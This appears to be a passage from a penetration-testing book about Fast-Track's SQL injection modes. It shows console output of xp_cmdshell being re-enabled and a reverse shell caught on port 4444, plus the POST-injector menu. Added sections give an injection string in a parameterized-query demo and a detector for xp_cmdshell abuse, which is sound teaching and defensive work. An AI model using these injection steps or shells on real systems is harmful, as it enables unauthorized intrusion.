
Chapter 11

Running cleanup before executing the payload...
Running the payload on the server...
Sending initial request to enable xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Success! Full access was granted to the system, all through SQL injection. Note that this attack will not succeed if parameterized SQL queries or stored procedures are in use. Note, too, that the required configuration for this attack is very minimal. After selecting SQL Injector - Query String Parameter Attack from the menu of attacks, you simply direct Fast-Track to the point of SQL injection. If the xp_cmdshell stored procedure is disabled, Fast-Track will automatically re-enable it and attempt privilege escalation of MS SQL.
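The parameterization point above is easiest to see side by side. The following is an added example, not code from the book or from Fast-Track: it uses Python's sqlite3 module as an offline stand-in for the MS SQL back end, builds a constructed product table, and contrasts a lookup that concatenates the query string parameter into the SQL text with the same lookup using a bound parameter.

```python
import sqlite3

# Constructed sample data standing in for a product table behind an
# ASP.NET/MS SQL site; sqlite3 is used only so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, public INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Widget", 1), (2, "Gadget", 1), (3, "Internal SKU", 0)],
    )
    return conn

def lookup_concatenated(conn, name):
    # Vulnerable: the request parameter is pasted into the statement text,
    # so whatever the client sends becomes part of the SQL that runs.
    sql = "SELECT id, name FROM products WHERE public = 1 AND name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, name):
    # Safe: the statement text is fixed and the parameter is sent separately,
    # so the database only ever treats it as a value, never as SQL.
    sql = "SELECT id, name FROM products WHERE public = 1 AND name = ?"
    return conn.execute(sql, (name,)).fetchall()

# Constructed test input: the classic tautology that a scanner such as
# Fast-Track probes for when it looks for error-based injection.
INJECTED = "x' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print(lookup_concatenated(conn, "Widget"))     # the one public Widget row
    print(lookup_concatenated(conn, INJECTED))     # every row, public filter bypassed
    print(lookup_parameterized(conn, INJECTED))    # no rows: the input is just a name
```

The concatenated version turns the WHERE clause into `public = 1 AND name = 'x' OR '1'='1'`, and since AND binds tighter than OR the non-public row leaks too; the parameterized version searches for a product literally named `x' OR '1'='1` and finds nothing.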

SQL Injector—POST Parameter Attack

Fast-Track’s POST parameter attack requires even less configuration than the preceding query string parameter attack. For this attack, simply pass Fast-Track the URL of the website you want to attack, and it will automatically detect the form to attack.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 

2

This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.

Example: http://www.sqlinjectablesite.com/index.aspx

Enter the URL to attack: 

http://www.secmaniac.com

Forms detected...attacking the parameters in hopes of exploiting SQL Injection..
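Both injector modes described in this section end the same way on the database side: the site's application login issues sp_configure to re-enable xp_cmdshell and then executes it. The following detection sketch is an added example, not part of the book or of Fast-Track. It scans constructed SQL Server trace-style lines (timestamp, spid, login, statement text; this layout and the login names are assumptions for the example) and flags those statements, treating any sp_configure call from the application login as a finding in its own right, since the web site's database account should never hold that right.

```python
import re

# Constructed sample lines in an assumed trace layout:
# "<date> <time> spid<N> <login> <statement text>". Not real captured data.
SAMPLE_LOG = """\
2011-03-01 10:02:11 spid55 web_app SELECT id,name FROM products WHERE name='Widget'
2011-03-01 10:02:13 spid55 web_app EXEC sp_configure 'show advanced options',1;RECONFIGURE
2011-03-01 10:02:13 spid55 web_app EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
2011-03-01 10:02:14 spid55 web_app EXEC master..xp_cmdshell 'whoami'
2011-03-01 10:05:00 spid12 dba_admin EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+) (?P<login>\S+) (?P<sql>.*)$")

# Logins used by the web application (assumed name); they never need sp_configure.
APP_LOGINS = {"web_app"}

# Each rule: name, severity, pattern applied to the statement text.
RULES = [
    ("xp_cmdshell_enabled", "critical",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("advanced_options_enabled", "high",
     re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1", re.I)),
    # Execution of xp_cmdshell itself; the optional master.. prefix is matched
    # so the sp_configure argument form 'xp_cmdshell' is not mistaken for it.
    ("xp_cmdshell_executed", "critical",
     re.compile(r"\bEXEC(?:UTE)?\s+(?:master\.\.|master\.dbo\.)?xp_cmdshell\b", re.I)),
]
SP_CONFIGURE_RE = re.compile(r"\bsp_configure\b", re.I)

def scan_log(text):
    """Return one finding dict per matched rule per line."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # not in the assumed layout; skip rather than guess
        ts, spid, login, sql = m.group("ts", "spid", "login", "sql")
        base = {"ts": ts, "spid": spid, "login": login}
        for name, severity, pattern in RULES:
            if pattern.search(sql):
                findings.append(dict(base, rule=name, severity=severity))
        # A configuration change from the application login is suspect on its
        # own, whatever value it sets: that account should not be able to do it.
        if login in APP_LOGINS and SP_CONFIGURE_RE.search(sql):
            findings.append(dict(base, rule="config_change_from_app_login", severity="high"))
    return findings

def critical_logins(findings):
    """Logins that triggered at least one critical rule, for triage."""
    return sorted({f["login"] for f in findings if f["severity"] == "critical"})

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["spid"], f["login"], f["severity"], f["rule"])
    print("critical logins:", critical_logins(SAMPLE_LOG and scan_log(SAMPLE_LOG)))
```

The dba_admin line that sets xp_cmdshell back to 0 produces no finding: the enable rules require the value 1, and the login is not an application account. The three web_app configuration and execution statements, which are what the re-enable step in both injector modes looks like from the server, are the ones that surface.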